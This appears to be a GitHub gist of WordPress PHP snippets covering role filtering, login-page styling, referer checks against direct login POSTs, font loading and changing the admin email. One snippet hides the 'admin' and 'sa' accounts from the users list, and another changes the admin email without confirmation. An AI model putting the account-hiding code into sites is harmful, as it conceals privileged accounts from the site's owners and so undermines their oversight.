@salipro4ever
Last active November 25, 2021 02:39
WP Script
// Remove the Administrator role from the roles list for users below level 10.
// 'editable_roles' is a filter, so register it with add_filter().
add_filter( 'editable_roles', 'hide_administrator_editable_roles' );
function hide_administrator_editable_roles( $roles ) {
    if ( isset( $roles['administrator'] ) && ! current_user_can( 'level_10' ) ) {
        unset( $roles['administrator'] );
    }
    return $roles;
}

//* Hide the 'admin' and 'sa' accounts from the users list for everyone else
add_action( 'pre_user_query', 'site_pre_user_query' );
function site_pre_user_query( $user_search ) {
    global $wpdb;
    $username = wp_get_current_user()->user_login;
    // The hidden accounts can still see themselves.
    if ( $username === 'admin' || $username === 'sa' ) {
        return;
    }
    $user_search->query_where = str_replace(
        'WHERE 1=1',
        "WHERE 1=1 AND {$wpdb->users}.user_login != 'admin' AND {$wpdb->users}.user_login != 'sa' ",
        $user_search->query_where
    );
}

# LIST ALL HOOKS ON REQUEST (debug helper: echoes each hook name the first time it fires)
$debug_tags = array();
add_action( 'all', function ( $tag ) {
    global $debug_tags;
    if ( in_array( $tag, $debug_tags, true ) ) {
        return;
    }
    echo "<pre>" . $tag . "</pre>";
    $debug_tags[] = $tag;
} );

// Show a warning notice on the admin screens for the 'post' post type.
// 'all_admin_notices' passes no arguments to its callback.
add_action( 'all_admin_notices', 'warning_msg_abc' );
function warning_msg_abc() {
    global $wp_query;
    if ( $wp_query->get( 'post_type' ) == 'post' ) {
        echo '<div class="notice notice-warning">
                  <h2>Đừng post/edit bài viết trong thời gian này, lỳ lỳ mất ráng chịu nha! 🤪</h2>
              </div>';
    }
}
@salipro4ever

Handling the case where functions.php runs first, so remove_action can't be used directly:

// Run after the theme is set up, so the parent theme's action is already
// registered when we remove it. w3s_pages_in_search_results() must be defined
// elsewhere in the child theme.
add_action( 'after_setup_theme', 'w3s_after_setup_theme' );
function w3s_after_setup_theme() {
    remove_action( 'woocommerce_after_main_content', 'flatsome_pages_in_search_results', 10 );
    add_action( 'woocommerce_after_main_content', 'w3s_pages_in_search_results', 10 );
}

@salipro4ever

// Change logo on backend login page.
function my_custom_login_logo() {
?>
<style type="text/css">
body.login {
    background: #fff;
}
body.login div#login h1 a {
    /* the second declaration overrides the first, so the SVG is what loads */
    background-image: url(/wp-content/uploads/2019/01/logo-300.png);
    background-image: url(https://thesugagroup.com/storage/logo_hor.svg);
    background-size: 220px !important;
    width: 320px !important;
    height: 100px !important;
}
</style>
<?php
}
add_action( 'login_enqueue_scripts', 'my_custom_login_logo' );

@salipro4ever

Ignore Direct POST Requests to the Login Page
The easiest way to stop this attack is to change wp-login.php. When we detect that the incoming request is a direct request with POST data, we ignore it. Add the following code at the beginning of the wp-login.php file:

/** for security reason, direct POST is not allowed **/
if (empty($_SERVER["HTTP_REFERER"]) && count($_POST)) {
	exit();
}

Adding Access Rules in .htaccess File
We can add RewriteCond rules to inspect every incoming request. When we find a POST request sent to the wp-login.php file that did not come from our own website, we make that request forbidden. Let's see the source code:

# Forbid POSTs to wp-login.php / wp-admin whose Referer is not our own site.
# https? is needed so logins on an HTTPS site are not blocked too.
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{HTTP_REFERER} !^https?://(.*)?yourwebsite\.com [NC]
RewriteCond %{REQUEST_URI} ^(.*)?wp-login\.php(.*)$ [OR]
RewriteCond %{REQUEST_URI} ^(.*)?wp-admin$
RewriteRule ^(.*)$ - [F]
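The same check written as a must-use plugin instead of an edit to wp-login.php (which the next core update would overwrite). This is an added example, not code from the gist: it hooks WordPress's login_init action, compares the Referer host against the host of home_url() so it behaves the same on http and https, and answers with a real 403. The function name w3s_should_block_login_post and the plugin name are assumed.

```php
<?php
/**
 * Plugin Name: Block referer-less login POSTs (example)
 * Place this file in wp-content/mu-plugins/ so it loads before wp-login.php runs.
 */

// Pure decision function (assumed name) so the rule can be reasoned about on its own.
// Returns true when a POST to the login page should be rejected.
function w3s_should_block_login_post( $method, $referer, $post, $home_host ) {
    if ( 'POST' !== strtoupper( $method ) || empty( $post ) ) {
        return false; // only direct POST submissions are in scope, GETs pass
    }
    if ( '' === $referer ) {
        return true;  // no Referer at all, the case the wp-login.php snippet catches
    }
    // Compare hosts only; scheme and path are ignored, so http and https both work.
    $ref_host = wp_parse_url( $referer, PHP_URL_HOST );
    return strtolower( (string) $ref_host ) !== strtolower( $home_host );
}

// login_init fires inside wp-login.php before any form action is processed.
add_action( 'login_init', function () {
    $home_host = wp_parse_url( home_url(), PHP_URL_HOST );
    $method    = isset( $_SERVER['REQUEST_METHOD'] ) ? $_SERVER['REQUEST_METHOD'] : 'GET';
    $referer   = isset( $_SERVER['HTTP_REFERER'] ) ? $_SERVER['HTTP_REFERER'] : '';

    if ( w3s_should_block_login_post( $method, $referer, $_POST, $home_host ) ) {
        // wp_die() with a 403 status instead of a bare exit(), so logs show the block.
        wp_die( 'Direct POST to the login page is not allowed.', 'Forbidden', array( 'response' => 403 ) );
    }
} );
```

The Referer header is supplied by the client, so this only filters naive direct submissions and is not a substitute for rate limiting or multi-factor authentication on the login form.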

@salipro4ever

/**
 * Add google font
 */
add_action( 'wp_head', 'themeprefix_load_fonts' );
function themeprefix_load_fonts() {
?>
<!-- Google Fonts -->
<script type="text/javascript"> !function(e,n,t){"use strict";var o="https://fonts.googleapis.com/css?family=Lora:400,700&display=swap&subset=vietnamese",r="__3perf_googleFontsStylesheet";function c(e){(n.head||n.body).appendChild(e)}function a(){var e=n.createElement("link");e.href=o,e.rel="stylesheet",c(e)}function f(e){if(!n.getElementById(r)){var t=n.createElement("style");t.id=r,c(t)}n.getElementById(r).innerHTML=e}e.FontFace&&e.FontFace.prototype.hasOwnProperty("display")?(t[r]&&f(t[r]),fetch(o).then(function(e){return e.text()}).then(function(e){return e.replace(/@font-face {/g,"@font-face{font-display:swap;")}).then(function(e){return t[r]=e}).then(f).catch(a)):a()}(window,document,localStorage);
</script>
<!-- End Google Fonts -->
<?php
}

@salipro4ever

salipro4ever commented Nov 25, 2021

Change admin email wp without email confirmation

Updating via functions.php in active theme:

You could set one time code (and delete it after) in functions.php of your active theme to update these options:

update_option( 'admin_email', 'admin@example.com' );
update_option( 'new_admin_email', 'admin@example.com' );

Put these within some admin_init action callback.
